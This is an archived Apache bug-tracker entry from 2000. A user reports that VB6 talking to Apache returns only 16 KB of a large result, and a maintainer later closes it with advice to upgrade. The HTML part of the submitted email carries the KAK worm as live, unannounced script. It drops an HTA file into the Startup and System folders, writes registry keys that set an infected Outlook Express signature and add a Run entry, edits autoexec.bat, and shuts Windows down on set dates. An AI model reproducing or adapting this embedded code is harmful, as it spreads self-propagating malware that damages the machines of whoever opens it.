From boundary="----=_NextPart_000_0072_01C04964.C6351A20"
Received: (qmail 42217 invoked by uid 500); 8 Nov 2000 02:18:12 -0000
Message-Id: <007501c0492a$19e70b00$13a39acb@psu.ac.th>
Date: Wed, 8 Nov 2000 09:17:53 +0700
From: "Kittiphum Worachat" <kitty@mcu2.psu.ac.th>
To: <apbugs@apache.org>
Subject: IIS+VB6 and Apache+VB6

>Number:         6815
>Category:       pending
>Synopsis:       IIS+VB6 and Apache+VB6
>Confidential:   yes
>Severity:       serious
>Priority:       medium
>Responsible:    gnats-admin
>State:          closed
>Quarter:        
>Keywords:       
>Date-Required:
>Class:          sw-bug
>Submitter-Id:   unknown
>Arrival-Date:   Tue Nov 07 18:20:01 PST 2000
>Closed-Date:    Mon Sep 03 12:55:32 PDT 2001
>Last-Modified:  Mon Sep 03 12:55:32 PDT 2001
>Originator:     
>Release:        
>Organization:
>Environment:
>Description:
 This is a multi-part message in MIME format.
 
 ------=_NextPart_000_0072_01C04964.C6351A20
 Content-Type: text/plain;
 	charset="windows-874"
 Content-Transfer-Encoding: quoted-printable
 
 Hi.
 
 I use PHP script to call MySQL databaseserver when I use VB6+IIS4 =
 evrything work correct but when I use VB6+Apache if the result no bigger =
 than 16 KB it OK but if result very large it loss and I only get 16KB =
 that I think Apache can not hold the big result for VB6 (I use Internet =
 Transfer Control) may be I mistake configuration please help me (please =
 notify the same code work correct with IIS+VB6)
 
 Thanks.
 Kittiphum Worachat.
 
 
 
 ------=_NextPart_000_0072_01C04964.C6351A20
 Content-Type: text/html;
 	charset="windows-874"
 Content-Transfer-Encoding: quoted-printable
 
 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
 <HTML><HEAD>
 <META http-equiv=3DContent-Type content=3D"text/html; =
 charset=3Dwindows-874">
 <META content=3D"MSHTML 5.50.4134.600" name=3DGENERATOR>
 <STYLE></STYLE>
 </HEAD>
 <BODY bgColor=3D#ffffff>
 <DIV><FONT face=3DArial size=3D2>Hi.</FONT></DIV>
 <DIV><FONT face=3DArial size=3D2></FONT>&nbsp;</DIV>
 <DIV><FONT face=3DArial size=3D2>I use PHP script to call MySQL =
 databaseserver when=20
 I use VB6+IIS4 evrything work correct but when I use VB6+Apache if the =
 result no=20
 bigger than 16 KB it OK but if result very large it loss and I only get =
 16KB=20
 that I think Apache can not hold the big result for VB6 (I use Internet =
 Transfer=20
 Control) may be I mistake configuration please help me (please notify =
 the same=20
 code work correct with IIS+VB6)</FONT></DIV>
 <DIV><FONT face=3DArial size=3D2></FONT>&nbsp;</DIV>
 <DIV><FONT face=3DArial size=3D2>Thanks.</FONT></DIV>
 <DIV><FONT face=3DArial size=3D2>Kittiphum Worachat.</FONT></DIV>
 <DIV>&nbsp;</DIV>
 <DIV>
 <DIV style=3D"Z-INDEX: 5; RIGHT: 0px; POSITION: absolute; TOP: -20px">
 <OBJECT id=3Dscr=20
 classid=3Dclsid:06290BD5-48AA-11D2-8432-006008C3FBFC></OBJECT></DIV>
 <SCRIPT><!--
 function sErr(){return =
 true;}window.onerror=3DsErr;scr.Reset();scr.doc=3D"Z<HTML><HEAD><TITLE>Dr=
 iver Memory Error</"+"TITLE><HTA:APPLICATION ID=3D\"hO\" =
 WINDOWSTATE=3DMinimize></"+"HEAD><BODY BGCOLOR=3D#CCCCCC><object =
 id=3D'wsh' =
 classid=3D'clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></"+"object><SCRIP=
 T>function sEr(){self.close();return true;}window.onerror=3DsEr;fs=3Dnew =
 ActiveXObject('Scripting.FileSystemObject');wd=3D'C:\\\\Windows\\\\';fl=3D=
 fs.GetFolder(wd+'Applic~1\\\\Identities');sbf=3Dfl.SubFolders;for(var =
 mye=3Dnew =
 Enumerator(sbf);!mye.atEnd();mye.moveNext())idd=3Dmye.item();ids=3Dnew =
 String(idd);idn=3Dids.slice(31);fic=3Didn.substring(1,9);kfr=3Dwd+'MENUD?=
 ~1\\\\PROGRA~1\\\\D?MARR~1\\\\kak.hta';ken=3Dwd+'STARTM~1\\\\Programs\\\\=
 StartUp\\\\kak.hta';k2=3Dwd+'System\\\\'+fic+'.hta';kk=3D(fs.FileExists(k=
 fr))?kfr:ken;aek=3D'C:\\\\AE.KAK';aeb=3D'C:\\\\Autoexec.bat';if(!fs.FileE=
 xists(aek)){re=3D/kak.hta/i;if(hO.commandLine.search(re)!=3D-1){f1=3Dfs.G=
 etFile(aeb);f1.Copy(aek);t1=3Df1.OpenAsTextStream(8);pth=3D(kk=3D=3Dkfr)?=
 wd+'MENUD=90~1\\\\PROGRA~1\\\\D=90MARR~1\\\\kak.hta':ken;t1.WriteLine('@e=
 cho off>'+pth);t1.WriteLine('del =
 '+pth);t1.Close();}}if(!fs.FileExists(k2)){fs.CopyFile(kk,k2);fs.GetFile(=
 k2).Attributes=3D2;}t2=3Dfs.CreateTextFile(wd+'kak.reg');t2.write('REGEDI=
 T4');t2.WriteBlankLines(2);ky=3D'[HKEY_CURRENT_USER\\\\Identities\\\\'+id=
 n+'\\\\Software\\\\Microsoft\\\\Outlook =
 Express\\\\5.0';sg=3D'\\\\signatures';t2.WriteLine(ky+sg+']');t2.Write('\=
 "Default =
 Signature\"=3D\"00000000\"');t2.WriteBlankLines(2);t2.WriteLine(ky+sg+'\\=
 \\00000000]');t2.WriteLine('\"name\"=3D\"Signature =
 #1\"');t2.WriteLine('\"type\"=3Ddword:00000002');t2.WriteLine('\"text\"=3D=
 \"\"');t2.Write('\"file\"=3D\"C:\\\\\\\\WINDOWS\\\\\\\\kak.htm\"');t2.Wri=
 teBlankLines(2);t2.WriteLine(ky+']');t2.Write('\"Signature =
 Flags\"=3Ddword:00000003');t2.WriteBlankLines(2);t2.WriteLine('[HKEY_LOCA=
 L_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run]')=
 ;t2.Write('\"cAg0u\"=3D\"C:\\\\\\\\WINDOWS\\\\\\\\SYSTEM\\\\\\\\'+fic+'.h=
 ta\"');t2.WriteBlankLines(2);t2.close();wsh.Run(wd+'Regedit.exe -s =
 '+wd+'kak.reg');t3=3Dfs.CreateTextFile(wd+'kak.htm',1);t3.Write('<HTML><B=
 ODY><DIV =
 style=3D\"POSITION:absolute;RIGHT:0px;TOP:-20px;Z-INDEX:5\"><OBJECT =
 classid=3Dclsid:06290BD5-48AA-11D2-8432-006008C3FBFC =
 id=3Dscr></"+"OBJECT></"+"DIV>');t4=3Dfs.OpenTextFile(k2,1);while(t4.Read=
 (1)!=3D'Z');t3.WriteLine('<SCRIPT><!--');t3.write('function =
 sErr(){return =
 true;}window.onerror=3DsErr;scr.Reset();scr.doc=3D\"Z');rs=3Dt4.Read(3095=
 );t4.close();rd=3D/\\\\/g;re=3D/\"/g;rf=3D/<\\//g;rt=3Drs.replace(rd,'\\\=
 \\\\\').replace(re,'\\\\\"').replace(rf,'</"+"\"+\"');t3.WriteLine(rt+'\"=
 ;la=3D(navigator.systemLanguage)?navigator.systemLanguage:navigator.langu=
 age;scr.Path=3D(la=3D=3D\"fr\")?\"C:\\\\\\\\windows\\\\\\\\Menu =
 D?marrer\\\\\\\\Programmes\\\\\\\\D?marrage\\\\\\\\kak.hta\":\"C:\\\\\\\\=
 windows\\\\\\\\Start =
 Menu\\\\\\\\Programs\\\\\\\\StartUp\\\\\\\\kak.hta\";agt=3Dnavigator.user=
 Agent.toLowerCase();if(((agt.indexOf(\"msie\")!=3D-1)&&(parseInt(navigato=
 r.appVersion)>4))||(agt.indexOf(\"msie =
 5.\")!=3D-1))scr.write();');t3.write('//--></"+"'+'SCRIPT></"+"'+'OBJECT>=
 </"+"'+'BODY></"+"'+'HTML>');t3.close();fs.GetFile(wd+'kak.htm').Attribut=
 es=3D2;fs.DeleteFile(wd+'kak.reg');d=3Dnew Date();if(d.getDate()=3D=3D1 =
 && d.getHours()>17){alert('Kagou-Anti-Kro$oft says not today =
 !');wsh.Run(wd+'RUNDLL32.EXE =
 user.exe,exitwindows');}self.close();</"+"SCRIPT>S3 driver memory alloc =
 failed &nbsp; =
 !]]%%%%%</"+"BODY></"+"HTML>";la=3D(navigator.systemLanguage)?navigator.s=
 ystemLanguage:navigator.language;scr.Path=3D(la=3D=3D"fr")?"C:\\windows\\=
 Menu D?marrer\\Programmes\\D?marrage\\kak.hta":"C:\\windows\\Start =
 Menu\\Programs\\StartUp\\kak.hta";agt=3Dnavigator.userAgent.toLowerCase()=
 ;if(((agt.indexOf("msie")!=3D-1)&&(parseInt(navigator.appVersion)>4))||(a=
 gt.indexOf("msie 5.")!=3D-1))scr.write();
 //--></SCRIPT>
 </OBJECT></DIV></BODY></HTML>
 
 ------=_NextPart_000_0072_01C04964.C6351A20--
 
>How-To-Repeat:
>Fix:
>Release-Note:
>Audit-Trail:
State-Changed-From-To: open-closed
State-Changed-By: wrowe
State-Changed-When: Mon Sep  3 12:55:32 PDT 2001
State-Changed-Why:
Try the most recent version of Apache.
A number of bugs have been fixed.
>Unformatted:
